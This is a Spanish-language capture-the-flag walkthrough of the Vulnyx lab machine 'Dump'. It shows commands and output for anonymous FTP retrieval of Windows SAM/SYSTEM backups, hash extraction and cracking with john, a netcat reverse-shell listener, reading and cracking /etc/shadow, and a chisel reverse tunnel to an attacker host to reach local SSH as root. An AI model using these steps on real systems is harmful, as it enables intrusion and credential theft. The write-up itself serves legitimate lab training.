Dump Vulnyx (Easy - Linux)
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 03:27 EDT
Nmap scan report for 192.168.5.84
Host is up (0.00061s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.5.84:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 root root 4096 Feb 09 2024 .backup [NSE: writeable]
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
4200/tcp open ssl/http ShellInABox
|_http-title: Shell In A Box
| ssl-cert: Subject: commonName=dump
| Not valid before: 2024-02-09T11:53:57
|_Not valid after: 2044-02-04T11:53:57
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:2F:9A:CF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.52 secondsVeremos varias cosas interesantes entre ellas un FTP que vemos de primeras que el modo anonimo si se puede loguear, por lo que vamos a intentar iniciar sesion.
FTP
ftp anonymous@<IP>Info:
229 Entering extended passive mode (|||35789|).
125 Data connection already open. Transfer starting.
drwxrwxrwx 2 root root 4096 Feb 09 2024 .backup
226 Transfer complete.Si listamos veremos que hay un .backup de directorio, si entramos dentro veremos dos archivos que seran los siguientes:
cd .backup
ls -laInfo:
229 Entering extended passive mode (|||41389|).
125 Data connection already open. Transfer starting.
-rwxrwxrwx 1 root root 24576 Feb 09 2024 sam.bak
-rwxrwxrwx 1 root root 3264512 Feb 09 2024 system.bak
226 Transfer complete.Vemos que son dos archivos relacionados con las tipicas claves que nos podemos encontrar en un windows para poder extraer los hashes NTLM de dicho windows, por lo que dentro tiene que haber cosas interesantes.
get sam.bak
get system.bakUna vez que nos lo hayamos descargado, vamos a extraer dichos hashes.
impacket-secretsdump -sam sam.bak -system system.bak LOCALInfo:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x042145cf7279c87791fa907cd6d9bccd
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:45ab968b011c0b6cfd1e9e1b30ff40cc:916da1881680fcb38f2ce951f666d6be:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:d0d506281c0dbfe0a16f57e412411d37:::
dumper:1004:ebd1b59f4f5a6843aad3b435b51404ee:7324322d85d3714068d67eccee442365:::
admin:1005:7cc48b08335cd858aad3b435b51404ee:556a8f7773e850d4cf4d789d39ddaca0:::
[*] Cleaning up...Veremos que lo hemos extraido de forma correcta, por lo que vamos a crear un archivo con dicho hash para poder intentar crackearlo.
hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dumper:1004:ebd1b59f4f5a6843aad3b435b51404ee:7324322d85d3714068d67eccee442365:::
admin:1005:7cc48b08335cd858aad3b435b51404ee:556a8f7773e850d4cf4d789d39ddaca0:::Ahora vamos a utilizar john para intentar crackearlo de esta forma:
john --format=NT --wordlist=<WORDLIST> hashInfo:
Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (NT [MD4 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=6
Press 'q' or Ctrl-C to abort, almost any other key for status
blabla (admin)
(Administrator)
1dumper (dumper)
3g 0:00:00:00 DONE (2025-08-19 03:51) 25.00g/s 19485Kp/s 19485Kc/s 19540KC/s 1ejem..1doxie
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.Veremos que ha funcionado la mayoria, por lo que vamos a guardarnos dichas credenciales por si las tuvieramos que utilizar en un futuro.
Vamos a investigar el puerto 80 a ver que vemos ahi dentro, pero no veremos nada interesante, ahora si probamos a entrar al puerto 4200 que desde el nmap vimos que era como una especie de webshell en la propia pagina, veremos un error si entramos asi:
URL = http://<IP>:4200/Pero en el reporte de nmap veremos que utiliza SSL por lo que tendremos que poner HTTPS de esta forma:
URL = https://<IP>:4200/Con esto si nos aparecera como una terminal en la propia web, vamos a probar a utilizar los usuarios y contraseñas que descubrimos anteriormente.
User: dumper
Pass: 1dumperInfo:
Linux dump 4.19.0-26-amd64 #1 SMP Debian 4.19.304-1 (2024-01-09) x86_64
dumper@dump:~$ whoami
dumperCon esto veremos que estaremos dentro vamos a realizar una reverse shell para tener una mejor shell.
Antes de enviarla vamos a ponernos a la escucha.
nc -lvnp <PORT>Ahora si enviamos lo anterior y volvemos a donde tenemos la escucha veremos lo siguiente:
listening on [any] 7777 ...
connect to [192.168.5.50] from (UNKNOWN) [192.168.5.84] 38774
dumper@dump:~$ whoami
whoami
dumperVamos a sanitizar la shell de la siguiente forma:
Sanitización de shell (TTY)
script /dev/null -c bash# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>Ahora vamos a leer la flag del usuario.
user.txt
cfbe86765c16e9bf8ddc3739f4f270a9Escalate Privileges
Si enumeramos un poco el sistema podremos ver lo siguiente:
ls -la /etc/shadowInfo:
-rw-r--r-- 1 root shadow 974 feb 9 2024 /etc/shadowVeremos que podemos leer el archivo shadow, si lo leemos veremos lo siguiente:
root:$6$jzcdBmCLz0zF2.b/$6sok07AjDc3TN3oeI/NqrdZ6NSQly3ADW6lvs3z5q.5GDqsCypL8WtL7ARhzDcdYgukakXWeNbiIP7GyigCse/:19762:0:99999:7:::
daemon:*:18898:0:99999:7:::
bin:*:18898:0:99999:7:::
sys:*:18898:0:99999:7:::
sync:*:18898:0:99999:7:::
games:*:18898:0:99999:7:::
man:*:18898:0:99999:7:::
lp:*:18898:0:99999:7:::
mail:*:18898:0:99999:7:::
news:*:18898:0:99999:7:::
uucp:*:18898:0:99999:7:::
proxy:*:18898:0:99999:7:::
www-data:*:18898:0:99999:7:::
backup:*:18898:0:99999:7:::
list:*:18898:0:99999:7:::
irc:*:18898:0:99999:7:::
gnats:*:18898:0:99999:7:::
nobody:*:18898:0:99999:7:::
_apt:*:18898:0:99999:7:::
systemd-timesync:*:18898:0:99999:7:::
systemd-network:*:18898:0:99999:7:::
systemd-resolve:*:18898:0:99999:7:::
messagebus:*:18898:0:99999:7:::
sshd:*:18898:0:99999:7:::
systemd-coredump:!!:18898::::::
dumper:$6$8sDPsnEu5ZBa8bgE$EqxYjZuAYVmAqbusMGgx.NmwUwx0UcSVe2Z/YTRk1DqBOnxFxNbot7ktfzYxNALw8iDKXrkfV5.e54uTMgr371:19762:0:99999:7:::
shellinabox:*:19762:0:99999:7:::Vemos que nos ha dejado, por lo que vamos a probar a crackear el hash del usuario root.
hash.root
root:$6$jzcdBmCLz0zF2.b/$6sok07AjDc3TN3oeI/NqrdZ6NSQly3ADW6lvs3z5q.5GDqsCypL8WtL7ARhzDcdYgukakXWeNbiIP7GyigCse/:19762:0:99999:7:::Ahora si lo intentamos crackear veremos lo siguiente:
john --format=crypt --wordlist=<WORDLISTS> hash.rootInfo:
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 6 for all loaded hashes
Cost 2 (algorithm specific iterations) is 5000 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
shadow123 (root)
1g 0:00:00:02 DONE (2025-08-19 04:04) 0.4830g/s 3942p/s 3942c/s 3942C/s weston..kaiden
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Veremos que lo hemos conseguido, pero si volvemos a la maquina a realizar el su para escalar al usuario root veremos que no nos deja, pero si investigamos un poco veremos el siguiente puerto.
ss -tulnInfo:
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 100 0.0.0.0:21 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:22 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:4200 0.0.0.0:*
tcp LISTEN 0 128 *:80 *:*Veremos algo interesante y es que hay un SSH de forma local, pero si probamos a conectarnos de forma local por SSH veremos que no nos deja, por lo que vamos a utilizar chisel para exponerlo a nuestra maquina host.
URL = Download Chisel GitHub
Ahora lo instalaremos de esta forma en nuestra maquina host.
go install github.com/jpillora/chisel@latestY haremos lo siguiente en dicha maquina:
chisel server -p 8000 --reverseDesde la maquina victima esto otro:
cd /tmp
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz
gunzip chisel_1.9.1_linux_amd64.gz
chmod +x chisel_1.9.1_linux_amd64
./chisel_1.9.1_linux_amd64 client <IP_ATTACKER>:8000 R:2222:127.0.0.1:22Info (VICTIMA):
2025/08/19 10:25:57 client: Connecting to ws://192.168.5.50:8000
2025/08/19 10:25:57 client: Connected (Latency 2.867261ms)Info (ATTACKER):
2025/08/19 04:16:00 server: Reverse tunnelling enabled
2025/08/19 04:16:00 server: Fingerprint NWSrKq19+/1bJLz5QUix+DiY2DwE7DGyis59k5LzuYo=
2025/08/19 04:16:00 server: Listening on http://0.0.0.0:8000
2025/08/19 04:25:56 server: session#1: Client version (1.9.1) differs from server version (0.0.0-src)
2025/08/19 04:25:56 server: session#1: tun: proxy#R:2222=>22: ListeningVeremos que ha funcionado todo de forma correcta, ahora vamos a conectarnos de esta forma por SSH con las credenciales de root.
ssh root@127.0.0.1 -p 2222Metemos como contraseña shadow123...
Info:
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[127.0.0.1]:2222' (ED25519) to the list of known hosts.
root@127.0.0.1's password:
Linux dump 4.19.0-26-amd64 #1 SMP Debian 4.19.304-1 (2024-01-09) x86_64
root@dump:~# whoami
rootCon esto veremos que ya estaremos dentro, por lo que leeremos la flag de root.
root.txt
60c60f8e926b65a55bf8bd6239bb616dLast updated